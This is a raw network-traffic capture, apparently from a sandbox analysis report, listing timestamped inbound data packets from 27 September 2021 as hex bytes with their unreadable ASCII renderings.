                                        2021-09-27 17:14:38 UTC137INData Raw: 1b a1 1e 32 d9 18 e1 f7 8c 44 57 bf a2 9e c8 6c be 71 c1 b4 46 f5 11 96 6b f7 d6 b3 66 5f 93 51 bd 52 2d 7c 83 55 02 6f af 3f 7e 69 ae 7f 05 cb 18 00 b8 f5 b7 c1 8b 42 e1 18 a6 e5 f6 38 e1 cd 45 03 ab e7 2b 66 a1 44 bb e4 21 c6 f3 5e 9f 0b c5 bf d4 fe 85 08 c2 52 15 d6 9d 49 6a b0 d1 09 11 b7 fe 28 43 1d f6 75 53 c2 85 c9 f4 0c a8 0f 53 cd 63 42 fa df 3f 68 ff 26 fd 04 ba b6 4e 85 b1 14 aa fc 14 bd 57 37 ce f8 1d 2d 46 8c 40 dc 50 14 62 ce 83 05 0d ca c1 44 81 ba 02 d1 11 96 96 fb 13 2d 60 b3 9d ec 7a 14 1b 03 8f 3f e8 61 e9 7a bc 71 f2 82 54 af 7d 1e 82 cc 13 b4 a6 d6 0b 7f 8b 6b 8c 31 58 f0 e1 9d 53 ee df 4a ab 86 5d 02 fa 8b 99 1d 66 70 30 ec 35 1b 48 a7 99 0c 57 f2 d2 1b 9f de b5 9b e6 7f 83 0d ad d6 dc c1 aa 21 b6 ea 43 0d 9a a2 83 10 6d 16 6d 77 60
                                        Data Ascii: 2DWlqFkf_QR-|Uo?~iB8E+fD!^RIj(CuSScB?h&NW7-F@PbD-`z?azqT}k1XSJ]fp05HW!Cmmw`
                                        2021-09-27 17:14:38 UTC139INData Raw: 03 00 43 53 9c 27 21 c3 2d c3 43 0b c5 d2 94 6c 5b c6 98 b4 28 a8 f1 69 bf 8d 5a 59 1d 9b 39 5a 1b 15 6d 3d 0e c0 66 cf 4e 20 25 aa 67 3a 66 85 3e 6f 71 40 2f 11 21 38 07 63 c3 d8 a9 d4 99 b5 68 5d fc fb ee cb b0 6a 69 40 09 b8 df b8 f8 ab f6 01 69 71 77 20 4c 5d 42 a3 1b cb 6d 05 d3 30 5f 3c 2d 0f 13 e6 0e 50 8a 26 d1 0b 25 81 bd 68 a3 4a 6e 15 ce 62 c1 e8 a4 07 53 e9 e4 62 8b a5 b5 1c 10 ad e2 40 52 d3 18 a9 14 60 58 5e 60 3e 8f 4e 10 9e eb 78 13 f9 01 b2 70 b5 8b aa b8 45 d8 80 03 c5 9f d2 7a 59 44 0c 2b f4 65 84 c3 f3 16 ff 9b fb f5 cc 03 49 2e 09 97 d4 1e 08 ac 47 c9 79 24 f8 e2 5c ac b3 63 a0 7d 60 81 6d 05 5b 19 d0 32 5e 8f 97 9a f5 a8 68 cd 76 0f e4 71 d5 87 24 c8 77 b6 52 46 33 d4 e8 ed 25 d1 b2 49 66 a2 72 9a b0 b5 72 67 09 97 7c d1 75 1f 32 c2
                                        Data Ascii: CS'!-Cl[(iZY9Zm=fN %g:f>oq@/!8ch]ji@iqw L]Bm0_<-P&%hJnbSb@R`X^`>NxpEzYD+eI.Gy$\c}`m[2^hvq$wRF3%Ifrrg|u2
                                        2021-09-27 17:14:38 UTC140INData Raw: 56 0d 99 da c4 42 03 2a ac f7 cb f4 91 f6 5f 9e 8a 9a f9 2e ec ad cf 74 ca 10 46 28 d6 f2 00 38 8e 2e 73 1c 38 f4 db 2d 21 66 02 dd 2b 5d bf 0f 5e ec 70 c8 ff b5 5b e3 b9 79 75 b7 ef af b8 54 40 96 85 74 25 ae e3 a6 55 25 9b 8d 15 e9 60 db 9c e7 00 73 b0 7d df 3b 73 1d 3d 8f 08 5a c5 8e c1 07 07 54 bc 2d 3a a4 b7 5b 40 6f e5 ef 4e 0b 10 24 e8 a6 85 d3 a4 45 bc bf 1b f0 fe b1 d3 8b cd 41 82 69 d9 fb e4 0b 60 7b c4 ba 94 3a c0 10 61 1b f8 54 d7 93 dc 5c b2 ed 36 e6 66 a6 bd fb 06 77 57 11 ca 4c 19 c2 3e 0a 6c 60 75 b5 21 dc 3e 31 98 c4 87 9a 86 f7 f7 d9 78 5c 83 e5 19 8e 09 e2 92 42 d5 48 c2 e0 cc 8f 03 ec 56 9d 71 54 4d d8 ef db 0e 2c 4f d0 0f 35 6e f7 bc 74 6e a9 08 fc ee 68 de 08 35 09 a7 c3 48 56 50 29 b6 0d 71 de c3 90 c6 4f 27 6d a6 96 83 01 43 4a 94
                                        Data Ascii: VB*_.tF(8.s8-!f+]^p[yuT@t%U%`s};s=ZT-:[@oN$EAi`{:aT\6fwWL>l`u!>1x\BHVqTM,O5ntnh5HVP)qO'mCJ
                                        2021-09-27 17:14:38 UTC141INData Raw: b3 ea 43 93 51 82 b6 12 51 81 48 2c 68 2b 41 e1 42 2c 05 bc c0 1a 04 98 f9 93 ec 99 fe e4 3f b5 c3 d6 8e c4 d0 45 23 42 fc 03 4b b9 6c 90 cc a7 be 40 d9 e1 96 e4 b4 d2 de 12 93 e7 7f 9d d5 90 50 4e 90 46 28 21 aa de d2 4b 10 de 47 41 ea ae e1 72 74 1b 88 2d 50 42 4e fc ff a7 f3 da 0b 75 07 b7 a8 6a a5 29 35 97 e1 34 b7 50 39 e6 ca 12 05 6d a4 c6 a4 e3 93 1c 53 a2 08 0b ea 58 df a4 97 8a d2 1c 89 b2 db 8a 0c 2b ae bd fb 7d 06 33 31 82 17 c3 49 6f 02 0f f2 8c 1f 75 a1 7b 3e 18 57 36 99 2e d5 06 60 af 4b 16 10 05 ed c1 bb 54 fd f7 7f 81 ab 59 28 7a df 86 62 ff 75 10 e7 17 80 49 3d bc bb 60 f9 e0 32 bd 45 b4 bb 96 42 ab 15 b2 c0 eb f0 80 0c b2 c0 c3 59 85 dd 1a 15 4d 02 4f eb 61 7c 96 ce a6 30 42 1b 2c f1 31 51 c7 4e 83 94 15 ae ac 6f 6e da 44 5c e1 fc 43 c5
                                        Data Ascii: CQQH,h+AB,?E#BKl@PNF(!KGArt-PBNuj)54P9mSX+}31Iou{>W6.`KTY(zbuI=`2EBYMOa|0B,1QNonD\C
                                        2021-09-27 17:14:38 UTC143INData Raw: 7f 39 b6 2b 5c 45 3c 6f 3d 11 f8 f5 c2 4c 20 3c 8d cd 69 fd 84 38 41 d7 83 b7 10 21 a6 02 7f d0 fe 89 f3 bd 98 7a 5b 4a d3 ec cb ad 62 8c 62 09 be ea 31 ae 1f f5 01 6b 7b 4b 5f d5 5c d8 82 16 e8 49 25 6d ab 7a 11 1c b4 2a d4 0c 4c a2 2b 00 2b 23 ab 26 3e 17 49 6e 17 c4 5b be 71 a5 9d 72 e4 c5 46 ab 1a 2e 39 3d 9f 67 79 61 d1 07 a0 1c 97 7a 5e 66 0b 38 18 a4 9d eb 7a 19 bf 7e 2b 71 2f aa a7 9e 61 f8 40 98 e0 b2 e0 f0 60 70 0e 34 d8 6d a2 e0 f3 10 ca 13 ad 41 cf 03 4b 24 4e e8 4d 1f 92 8d 4a ed 5d 04 39 79 79 81 81 9d 99 48 62 9f 45 08 4c 38 d6 18 c3 de 26 b6 f7 ac 4e 25 f1 71 7d ea f0 ae 15 d8 55 74 53 dc 16 d9 1a d2 05 e7 ae 61 4b 80 36 bd 9a 33 13 f5 20 ba 7a f1 b0 34 b4 bc a9 cd f5 88 62 4a 3f dc 07 53 49 97 43 72 95 71 f7 8b b3 66 a9 d1 93 f3 41 9a 79
                                        Data Ascii: 9+\E<o=L <i8A!z[Jbb1k{K_\I%mz*L++#&>In[qrF.9=gyaz^f8z~+q/a@`p4mAK$NMJ]9yyHbEL8&N%q}UtSaK63 z4bJ?SICrqfAy
                                        2021-09-27 17:14:38 UTC144INData Raw: 0e f2 31 56 3a 8e 0e 98 22 15 e6 e2 18 5e 49 00 dd 0d 1e 1a 71 c7 f2 60 e4 f2 53 5a e5 93 65 2e 03 fc 89 9c 90 19 94 85 54 39 90 ce b4 6c 0c eb a2 17 e9 46 88 39 99 99 6d a8 51 d2 dc 72 1b 17 93 53 ee d6 a8 e5 c2 5f 56 bc 0d 2f 9a 9a 49 79 45 94 c0 4c 0b 36 9f 4d d8 1c cd ab 69 b1 5b 1a f6 d4 a9 88 3f de 67 a6 af 82 f9 e4 2b 63 45 e9 ab ad 11 b2 3f 63 1b de de 76 ed 45 43 9a c4 14 01 61 8c 3b 1f ba 5b 46 33 ca f0 1a c2 3e b0 ed 56 67 93 1d af 11 33 98 e2 05 3b f8 6e e9 c1 54 51 69 e4 1f a4 11 b9 26 52 f3 6c 0a bd ce 8f 23 dc 68 b0 60 6f 45 a9 ef db 08 26 09 8d 96 34 74 db b1 9f 6f af 22 e4 b5 dc cd 2e 11 c0 fb c1 48 76 7b 17 9b 1c 48 f4 b6 bf c4 4f 01 83 03 e8 1a 1e 6b 63 b6 0a 25 e9 ad 97 5c 74 5c d7 b4 36 79 7a 99 2e 0d 1f c6 62 8d f5 78 e5 1c bb f5 59
                                        Data Ascii: 1V:"^Iq`SZe.T9lF9mQrS_V/IyEL6Mi[?g+cE?cvECa;[F3>Vg3;nTQi&Rl#h`oE&4to".Hv{HOkc%\t\6yz.bxY
                                        2021-09-27 17:14:38 UTC145INData Raw: a6 da c4 33 9d 45 a8 37 e1 cd 41 03 23 f2 2b 66 21 49 bb f4 07 e0 a7 da e1 92 e4 0f f5 de 12 16 cd 7a a2 f1 b0 5d 66 16 38 91 10 b7 da f2 2b 1f f6 6a d9 cf 85 d9 d2 2a fd 8b 2d 54 42 fd db ff a7 76 f1 0e 4a 23 97 a2 42 23 57 8c ab fc 30 97 cf 35 ce e7 8a 20 46 9c 66 fa fa 90 1c 57 a2 c8 2c ea 58 5a 9d 92 b5 f6 3c 82 9a 5d f4 b5 61 b3 b9 db e3 16 1b 1c 1a 32 e8 71 cf 5c 17 f1 8c 1b 75 46 5c 3e 18 d2 0e 9c 11 f1 26 68 87 cd 68 a9 59 f0 c5 9b c9 ec df 52 19 8e 72 10 da 81 9d 61 ff 71 10 ee 33 80 49 b8 94 be 5f dd c0 3b 95 c3 ca 02 e7 5f af 35 2e d4 c3 dd 18 29 99 f8 63 07 9f de 1a 11 4d 01 6b eb 61 f9 a7 cb 99 14 62 0d 04 77 4f e8 40 53 87 b4 8e bb 84 42 f6 ff 6f 64 41 a2 5e c6 5f 2b 27 89 d1 cd de 08 9c ee b2 88 9e df e7 6b d3 56 ef ef 39 74 8b f4 11 01 a2
                                        Data Ascii: 3E7A#+f!Iz]f8+j*-TBvJ#B#W05 FfW,XZ<]a2q\uF\>&hhYRraq3I_;_5.)cMkabwO@SBodA^_+'kV9t
                                        2021-09-27 17:14:38 UTC146INData Raw: 10 e1 41 b8 51 52 9f c4 8b 12 b2 46 e2 d0 07 f1 5e 93 cb b8 90 2b 5a a3 dc 28 42 ad 1f c5 65 2c 01 84 e2 35 06 98 65 9c 43 f5 41 c5 35 b3 e3 43 ac e0 cd df 06 70 e1 0d 46 2e 6e 96 e6 01 7f ff d8 e1 85 ec 92 d2 de 14 23 40 2c 16 f2 b0 5f 6c 06 44 08 11 2d fb ff 45 3b d6 fc 41 ea a8 eb 34 2c 82 89 35 7c 4f 40 fe f9 8d eb 81 bf 66 21 93 84 ff a7 29 15 30 d9 19 a6 69 17 59 e5 10 05 4b 4c 66 da 7a 85 34 7a 80 05 0f c0 da 3b 18 bb 98 f0 1c 1c b2 db 8a b6 45 9e ac dd 42 8c 19 1c 80 37 06 45 e9 7c 8e db a1 19 55 a9 53 bc 66 54 12 b4 38 d3 bf 6c ad 4b 8c 15 75 e1 e7 9b d2 ec df 52 a3 6e 79 02 fc b6 37 4e fd 71 36 c2 97 fe d0 a6 99 92 52 45 c2 3d bf df 91 b6 f7 79 8b 8f af d6 c3 fd 44 2a b4 ea 5d 0f 31 de 1a 17 47 90 33 72 60 e6 b7 c3 2f 14 62 0b b4 d4 1c 60 67 73
                                        Data Ascii: AQRF^+Z(Be,5eCA5CpF.n#@,_lD-E;A4,5|O@f!)0iYKLfz4z;EB7E|USfT8lKuRny7Nq6RE=yD*]1G3r`/b`gs
                                        2021-09-27 17:14:38 UTC147INData Raw: d3 92 42 fd 04 00 b5 28 36 f4 ff af ab 7a 7f 39 b6 2b 5c 45 b7 6f 3d 11 f8 41 ca 4c 20 3c 8f cd 69 fd 84 38 41 d7 83 b7 10 21 a6 02 f2 d0 fe 89 f3 bd 98 7a 5b 4a 5e ec cb ad 62 5a 6a 09 be ea 2c ae 1f f5 01 6b 7b 4f 5f d5 5c d8 82 16 67 49 25 6d ab 7a 11 1f b4 2a 5b 0c 4c a2 2b e7 23 23 ab 24 18 12 66 6c 11 e8 f7 42 96 3d 9c 76 c0 d6 fa a9 1a b4 86 35 a0 50 7f 72 6d 05 a0 3c 6d 18 76 66 14 12 18 a4 9d eb 7a 19 bf 7e 2b 71 2f aa a7 15 61 f8 40 98 e0 b2 e0 f0 60 fb 0e 34 d8 6d ee e9 f3 10 ca 17 ad 41 cf 03 4b 24 4a e8 4d 1f 92 8d 4a 18 5d 04 39 79 79 81 82 9d 99 bd 62 9f 45 08 0c 31 d6 18 c2 d9 23 99 f5 aa 62 8d 09 96 e5 eb f4 8a f4 ec 57 74 c9 63 1e e5 2e d4 e4 d3 ac 61 6b fd 5a 9c 9a 2d 24 d3 0a 97 7e db 30 60 ab c3 30 c8 d5 4e 40 7d 3d 46 22 e4 7e 9c 71
                                        Data Ascii: B(6z9+\Eo=AL <i8A!z[J^bZj,k{O_\gI%mz*[L+##$flB=v5Prm<mvfz~+q/a@`4mAK$JMJ]9yybE1#bWtc.akZ-$~0`0N@}=F"~q
                                        2021-09-27 17:14:38 UTC148INData Raw: 88 c6 bf f3 b5 d9 cd f2 89 e7 c3 ed 3d 52 24 74 6f 98 39 8e 0a 22 e5 3a f4 c4 a2 2c 66 11 fb 0d 95 3b 71 c7 cd ed e7 df 51 42 cb 94 e1 50 9c d7 0b e6 29 40 96 81 74 40 b7 e3 a6 d0 09 9e b1 31 c9 85 f3 1a 99 b9 ed 9b 79 ff c0 5a 30 3f 15 2b 5d 51 d6 78 e3 06 50 9c e9 b7 bf b7 c1 7a 48 df e4 6c ef 14 0e 6e f8 bb f9 a4 41 83 52 32 dd fc 2b f0 8c 5d 19 3b 8e d8 ff c4 ce fb 60 c4 20 ae 1c f9 1b 43 fe fc 7e 55 cd f7 76 b2 e9 08 29 4a a4 bd 67 09 dc 38 ae eb ab 1c e2 d8 28 c8 7b ef 90 10 e6 35 13 7e c0 ad 18 d8 d4 dd d9 7c 63 41 cc 34 8c 93 c1 95 d5 8d f1 2b e1 c8 af c4 44 4d 9d eb 6c 48 e7 cb fb ef 04 c9 ae b6 d0 45 f3 9c 82 79 81 25 64 cb 43 e6 a8 6b 79 a7 c3 4c 56 09 30 b6 0d f4 f1 c6 af e2 6f c9 45 20 e8 3a fa 68 4e b4 15 29 eb 06 eb c5 73 76 51 ea f1 7a 7a
                                        Data Ascii: =R$to9":,f;qQBP)@t@1yZ0?+]QxPzHlnAR2+];` C~Uv)Jg8({5~|cA4+DMlHEy%dCkyLV0oE :hN)svQzz
                                        2021-09-27 17:14:38 UTC150INData Raw: bc 19 58 4b 2f 01 9c ea 76 29 98 63 aa e9 a6 da c4 33 9d 45 a8 37 e1 cd 41 03 54 f3 2b 66 21 49 bb f4 07 e0 d0 db e1 92 e4 cb fd de 12 16 f0 7a a2 f1 b0 5d 66 16 38 91 10 b7 da f2 5e 1e f6 6a d9 cf 85 d9 d2 2a 88 8a 2d 54 42 e4 d3 ff a7 76 e4 0e 4a 23 97 a2 42 23 57 8c ab fc 30 97 44 34 ce e7 8a 20 46 9c 66 fa 71 91 1c 57 a2 c4 24 ea 58 5a a8 92 b5 f6 3c 82 9a 5d f4 b5 61 b3 b9 db 6e 17 1b 1c 1a 32 e8 71 cf 5c 9a f0 8c 1b 75 45 54 3e 18 d2 22 9c 11 f1 26 68 87 cd 68 a9 59 f0 c5 9b 46 ed df 52 19 8e 72 10 da 81 12 60 ff 71 10 f3 3b 80 49 b8 bb be 5f dd c0 3b 95 c3 ca 02 e7 5f af 35 a3 d5 c3 dd 18 29 99 f8 63 07 12 df 1a 11 4d 2f 63 eb 61 f9 a8 cb 99 14 62 0d 04 73 4f e8 40 53 87 b4 05 ba 84 42 f6 ff 6f 67 41 a2 d5 c7 5f 2b 27 f6 d9 cd de 00 a0 eb 9d 8a 98
                                        Data Ascii: XK/v)c3E7AT+f!Iz]f8^j*-TBvJ#B#W0D4 FfqW$XZ<]an2q\uET>"&hhYFRr`q;I_;_5)cM/cabsO@SBogA_+'
                                        2021-09-27 17:14:38 UTC151INData Raw: bf e3 e7 4b 36 9b 36 59 e3 f4 bb 32 f6 d1 b2 5c f2 95 00 70 1c ac 40 7b 94 9f 89 20 02 24 4b b7 ab ad e0 49 04 c1 71 c6 3d f0 94 b9 23 d2 ad a8 15 5d c8 2d ac a0 f5 b6 d0 a6 be 29 8e 6a 89 c3 34 9e 14 a1 92 0d 83 9b b1 c7 f4 83 67 79 56 6a 26 02 ee 5e 5f d9 09 bc 19 bd a8 32 c0 f4 f0 77 e3 00 8f f9 f7 eb ce b8 f5 c1 73 25 42 de 95 9a b4 16 82 de 1d d9 f1 3b b0 1d 5e 9e dd a2 91 45 36 7e 5c ae 24 f6 94 ac 5d 83 71 cb 38 8b 55 3e 53 91 d2 85 6c fd f6 20 a8 25 6e 46 a1 2e ca e1 db 9f 38 16 f5 28 40 24 72 87 77 a5 9e 7d a8 b6 d2 38 6c 14 7b fc e5 c4 8c 2b e4 49 78 11 76 27 f4 0c ff 24 ed b7 74 57 bc 74 c3 a4 3c 11 fa 0b 83 7c df a3 05 1c ec 00 d9 e2 a2 60 54 1a e7 05 fa 45 8a 66 74 9d 41 f8 a1 88 6b 9a e9 a0 d4 6f 8b 75 a3 8d 06 a3 45 c0 c1 9e 6d e4 a6 84 fd
                                        Data Ascii: K66Y2\p@{ $KIq=#]-)j4gyVj&^_2ws%B;^E6~\$]q8U>Sl %nF.8(@$rw}8l{+Ixv'$tWt<|`TEftAkouEm
                                        2021-09-27 17:14:38 UTC152INData Raw: ed ab ee 21 d0 9c d8 9e 2f 04 91 2e 33 a8 a4 49 10 4e 8f 61 0d 7a 62 4c fe 63 7d ad 5f 32 69 29 c6 ed 36 3c 9d 31 df 7e 95 1a 50 df 31 e6 6a 52 e2 85 ab 8c a2 d9 50 35 60 53 df d4 24 b7 5b 02 0c f9 fb cc 79 25 a2 ad f7 94 ed 7d ad 69 23 cd 2a f5 99 58 4c 8b 57 15 7e 8c 50 0b 62 a2 bb 56 82 02 ce a7 94 24 e5 2d 6c 0d f7 6b 20 98 2d 31 a0 f2 1b 7f 3b e4 fe 3d 7b 0f 10 77 b6 ce 7d e5 4f 09 b0 00 0f 9a 58 9b 60 58 b2 b3 da 6e 86 18 8c a8 07 05 12 d0 2c ff ef a1 93 7b c0 6e 35 b2 9b c7 2b 5e 1b d9 63 5c 6b e7 b1 fc 02 0c db b3 8b 6a 45 ea 99 9b 26 f9 45 76 d3 5f cd 44 3d c7 83 e2 75 07 8e 53 c5 7d 4d a3 ce 98 a3 2b 46 7d 47 ed 65 60 31 7e d9 7a 4e f7 42 e0 ac f0 95 45 1d fa b2 b9 5a 62 ab f1 1a 8e 65 7d e2 7d 84 13 b0 f4 ea 80 e0 ad 9c 40 d6 68 d4 f2 f9 64 1a
                                        Data Ascii: !/.3INazbLc}_2i)6<1~P1jRP5`S$[y%}i#*XLW~PbV$-lk -1;={w}OX`Xn,{n5+^c\kjE&Ev_D=uS}M+F}Ge`1~zNBEZbe}}@hd
                                        2021-09-27 17:14:38 UTC153INData Raw: 00 8b c7 0d c7 07 4b f8 18 4a 0b 22 19 49 32 44 01 c8 88 49 d9 01 28 2b cd de 00 c8 c8 c1 67 1e 13 c0 8b 34 a9 ab 1f 1b 44 0b f7 33 78 c0 f1 cd ed 4c 06 00 c3 4b 89 cd 97 25 47 d2 17 95 b2 5a 4e 8d 0c f4 90 d9 ee 1b 1c 75 c3 0d c1 6e 93 02 0d e7 76 7f 83 1f 42 96 e5 c9 a5 74 87 d5 81 d4 79 39 f3 fa ee 3a 5b 43 76 fc 7d ad 0b 85 0b ff 93 e6 6c 3e c6 0a 46 79 b6 61 c4 42 9c 50 1a de 32 72 48 21 80 d0 ab 58 b7 cc 40 92 85 52 11 e5 94 16 47 f4 79 3a e6 19 9c 7f b9 96 83 73 c4 d1 79 f8 00 83 81 dc 6d b0 25 90 ed ea fd 84 3d 9d dd 66 3c 0f ca 23 38 5c 3b 67 9a 6e d3 84 dc 88 15 51 3b 28 c1 fa be 8e ce 1d 0a ab 1e 2b eb f9 4b d6 f1 ce 2d 6d 75 d2 a2 89 31 0a 14 08 c7 50 16 5d 62 43 08 24 07 55 32 09 0f df f6 ff 10 ff e4 fa 66 e9 f2 f0 c6 02 29 c2 f9 b4 e8 22 db
                                        Data Ascii: KJ"I2DI(+g4D3xLK%GZNunvBty9:[Cv}l>FyaBP2rH!X@RGy:sym%=f<#8\;gnQ;(+K-mu1P]bC$U2f)"
                                        2021-09-27 17:14:38 UTC155INData Raw: 6c 63 14 06 da d4 91 a9 2e 70 be 05 a8 4f ae 85 db 75 8b e4 f5 74 31 9f 7a e1 d3 9c c0 c0 d5 e6 0f e4 14 91 a7 44 ec 2e ee b0 4a a9 ee 28 23 03 0e ed c7 dc f3 bf 8c 61 d7 96 5a b6 06 c8 70 41 da 1b 09 19 9d 15 d0 7e 19 08 0c 3c 55 6a 5a ed b6 b5 1a 5c 5f 67 c3 50 7e da ef da 03 81 2f 75 ae b5 af 8c 69 15 2b 10 fb 76 87 97 de 3b 93 45 dd 43 92 42 62 5f 93 c6 98 3c b1 d9 4e 95 14 48 04 d9 61 e2 d6 9e af 6f 31 aa 40 39 48 36 f3 24 fc de 2d a4 8f d9 49 0c 03 71 91 ed 98 b6 5e f7 38 07 38 5f 5f 93 76 90 31 bf cb 18 28 3b ee 07 05 df 95 14 96 77 e9 68 40 d1 fb 02 fa 01 3d 14 b8 b1 e7 04 df 15 ab 63 81 8e 71 b7 76 38 7c f9 57 4d 24 52 ea 20 90 28 11 88 bd 44 f4 9d e1 0c e2 d3 f1 82 af 3e 1d bc d1 3a b7 61 66 23 70 7b b5 37 48 55 34 71 0e e1 ad d6 76 a6 ed 61 d4
                                        Data Ascii: lc.pOut1zD.J(#aZpA~<UjZ\_gP~/ui+v;ECBb_<NHao1@9H6$-Iq^88__v1(;wh@=cqv8|WM$R (D>:af#p{7HU4qva
                                        2021-09-27 17:14:38 UTC156INData Raw: e0 0b 06 55 00 e3 9a 1f 09 96 45 df 5e be 2f 3b c2 02 ca 59 6e 2b 45 74 5f 60 37 8e eb b7 9d 56 14 e9 59 e6 f5 ff 04 14 28 9c 8f 15 44 47 46 76 c7 00 cc bc 5c b8 78 3b 84 d8 0a d0 82 9e 08 c3 f9 ad b1 81 47 8f 2f ae c2 fb 5d 92 4f 03 65 a8 06 2d 9b 3d 0a b4 ed 1d 03 5a bc b3 7f 35 4b 4f 38 eb 85 08 c2 36 30 c4 6b 64 a4 02 e6 14 2e 9c c0 b2 08 e2 74 d2 e1 07 1b 51 d3 21 ee fc a9 f2 18 9b 22 64 cb f4 be 1e 7c 67 b1 69 75 43 c7 f9 ef 3d 23 e4 8b 48 cb b4 33 42 5e a6 40 cf b6 2d 88 05 ea da 65 5e 0a 9f b8 2c e8 78 f1 90 2b 0e 5f 37 aa c6 a2 f8 2c d4 c0 81 84 64 db e5 39 c5 2c 0d a1 84 03 7e 97 82 97 62 59 e8 cc 29 b9 5b 53 8b 5c ec 77 bd f5 e3 96 f6 a1 98 47 c2 60 c1 a4 f8 5a 71 c0 76 0c b1 fd dd 66 ef ca 9b 25 e4 f4 5e 51 15 df 3a 16 d4 c0 d4 17 0d 29 2b f8
                                        Data Ascii: UE^/;Yn+Et_`7VY(DGFv\x;G/]Oe-=Z5KO860kd.tQ!"d|giuC=#H3B^@-e^,x+_7,d9,~bY)[S\wG`Zqvf%^Q:)+
                                        2021-09-27 17:14:38 UTC157INData Raw: 2b 76 69 df a4 a3 28 7b 83 1c 34 99 c9 cc 84 57 c2 fa 7d 0c 3a 39 9b 9f f7 3b ac 7b 3c 4c df de 04 ca 52 7c e3 9b 54 c5 37 41 bd 8c 67 43 13 f0 2d b4 39 c8 75 35 fd 7c 6b 88 61 25 ec a4 c8 cf 30 98 a9 d2 95 73 38 83 b3 ef 71 4d 45 36 9a 1c cf 6a f9 72 8f bc c4 3e 57 bc 7c 77 56 c6 36 93 1b c4 04 4d 95 7a 68 3e 78 db e3 c2 48 e0 d4 49 b5 98 6d 3f cf 97 29 41 f2 61 33 ec 07 4f 96 7b 55 4a 81 00 08 ed 6a 80 67 4e 6f 83 63 c3 2a 1d 1f 11 4b d5 7b 66 ca e4 c8 18 db c0 aa c7 af 13 d6 54 13 1c 5c e6 97 ee dd 28 df 85 fa f5 6b 69 e1 51 7e ac ae 38 be 94 82 2a 71 7f b9 a4 9e 30 7b 51 6e 8b 0a 56 08 54 43 4c 4f 7b 3e 50 67 48 b1 d9 94 78 b3 9d aa 13 9a ca cc e3 72 6b 81 b7 e7 bc 4d 94 c9 9e c0 58 42 d7 66 7e aa bc 4b 04 48 f8 20 53 0b 3f 10 f4 35 0c f3 16 13 ba fa
                                        Data Ascii: +vi({4W}:9;{<LR|T7AgC-9u5|ka%0s8qME6jr>W|wV6Mzh>xHIm?)Aa3O{UJjgNoc*K{fT\(kiQ~8*q0{QnVTCLO{>PgHxrkMXBf~KH S?5
                                        2021-09-27 17:14:38 UTC159INData Raw: 31 27 2e 61 54 fd 72 ce 2f 3a 95 31 f7 55 66 c4 42 7d 5c 26 07 57 98 a4 b0 9a e7 dd 2a b5 86 3b cf 62 d7 7b 59 a6 49 52 54 c8 06 b8 7f 5d 5c 5d 37 2e 2f 37 8f 8a e5 6a 3e 69 0c ba 6a 0f b8 96 bf 51 e6 47 07 e0 a7 df cf 41 5b 73 31 f5 7d 9d d3 f8 03 c1 14 b0 44 e1 13 7d 32 fb a6 ef 23 a5 8b 59 fd 7d 34 e1 18 bb 55 0e 44 74 a3 b1 4b 8a fb 9b f8 1d c5 0b 2b df 4e 7e 52 c3 83 99 f3 24 3f 34 7c a1 16 bc 96 b7 93 f2 0b e1 0b c6 72 61 81 a4 4b aa 6e 61 c6 f0 49 f2 69 90 03 54 e8 d0 32 9c 14 11 7c da f7 f5 78 88 4f ec 36 d1 d4 96 00 77 09 31 c4 d8 94 03 ce 11 05 c7 0b 23 a4 e2 1d 7d 6b c6 29 87 c0 4e 7a bb 26 c5 69 b0 2c db 0e 7d 7d 2e 32 db 59 2d 38 48 06 21 c7 dc a0 5e db f0 4f 9c 66 92 2c c2 d8 df 95 c5 b4 e0 af 82 14 14 df 5a 96 f7 a4 5c 5e 93 74 3e 0c d9 bd
                                        Data Ascii: 1'.aTr/:1UfB}\&W*;b{YIRT]\]7./7j>ijQGA[s1}D}2#Y}4UDtK+N~R$?4|raKnaIiT2|xO6w1#}k)Nz&i,}}.2Y-8H!^Of,Z\^t>
                                        2021-09-27 17:14:38 UTC160INData Raw: a2 94 de bf 2a 76 ed 2c 95 ea 91 7d 0e 3e 95 ef 14 51 3f 53 36 fb 3d f1 81 62 bd 15 3a e4 e1 20 d8 b1 d4 73 f6 b4 c5 ef f0 25 c1 72 e4 be 89 28 f4 36 58 36 d1 50 73 fe 6b 7d 81 da 32 29 59 a2 a0 50 0b 68 77 0a d8 9f 04 f5 07 1f fa b4 ac 41 c4 3b cf ec 42 0f 7c dc 2a 94 14 13 ba 96 b1 2f d3 47 43 09 66 a8 2e ac fe 25 15 5e e2 ec 82 7a 8f a9 86 16 01 3d ab cb 29 46 70 d7 8e 1b 7c 35 8b 5f e3 8e 26 ed 70 91 b5 44 06 79 ed b2 3a f4 6e d9 c9 6c 52 0f 08 9e ee 90 e7 44 90 89 cc d8 2c 99 b9 0d e6 2b 16 c6 c2 4b 0d f9 ed c4 3b 13 8f dc 7e fb 14 08 db 49 b4 2e 96 db c4 db bc b5 ba 69 e9 47 bc b3 97 35 5a e6 12 70 a3 15 15 86 32 47 03 84 02 66 b2 b1 c6 21 da f2 39 17 30 ae bf b4 fc 1a 28 05 5f fc bd 4a c3 67 a5 66 03 37 b4 22 49 19 ba f7 41 e0 6a 74 18 62 1f 5e 62
                                        Data Ascii: *v,}>Q?S6=b: s%r(6X6Psk}2)YPhwA;B|*/GCf.%^z=)Fp|5_&pDy:nlRD,+K;~I.iG5Zp2Gf!90(_Jgf7"IAjtb^b
                                        2021-09-27 17:14:38 UTC161INData Raw: 2e 6e 28 d3 f3 3e fe 3f 0d a0 ea 3e af 1d 26 c7 e2 03 5f 70 89 6e f4 40 f2 07 76 a5 26 24 de 38 60 a6 89 bd d3 07 ac 8d a2 b2 1c 4e 83 8e dc 61 00 1c 1e 91 0c 2c 8d 61 ae 43 6c 1a ee c5 71 d0 d6 f0 3e f2 56 c3 1a be de 5c b7 fe c8 be 10 25 58 b4 17 2c c7 00 6f 95 c1 37 6d c7 a7 39 b7 fe 3d da 41 84 67 51 2d 97 35 36 c3 11 ed 10 63 13 b7 09 ac 5d 21 44 53 1e 84 1e 64 dd ab 97 5b 93 84 ee 98 98 67 ef 78 26 28 24 9a ed a6 ae 6b b7 e1 c3 c1 16 50 f1 13 7d bb 90 27 ef 83 93 75 22 3d af 8a f4 5b 49 26 34 fe 6f 2b 22 6f 7a 3e 25 04 4d 7e 0d 0a 73 4f 17 ef 5c 1e 21 93 1d 11 14 72 b7 9a 2f 02 15 59 82 78 26 64 2c 96 f2 30 9d 82 13 3b b2 fe 9a 32 fd 9a f7 f6 cf 3f e3 e9 26 c6 9e 87 ca 2a 55 c3 d4 61 90 10 83 74 a5 e0 11 ce 01 b4 e8 4f 1f 39 0e 30 77 d9 a9 e9 fc 00
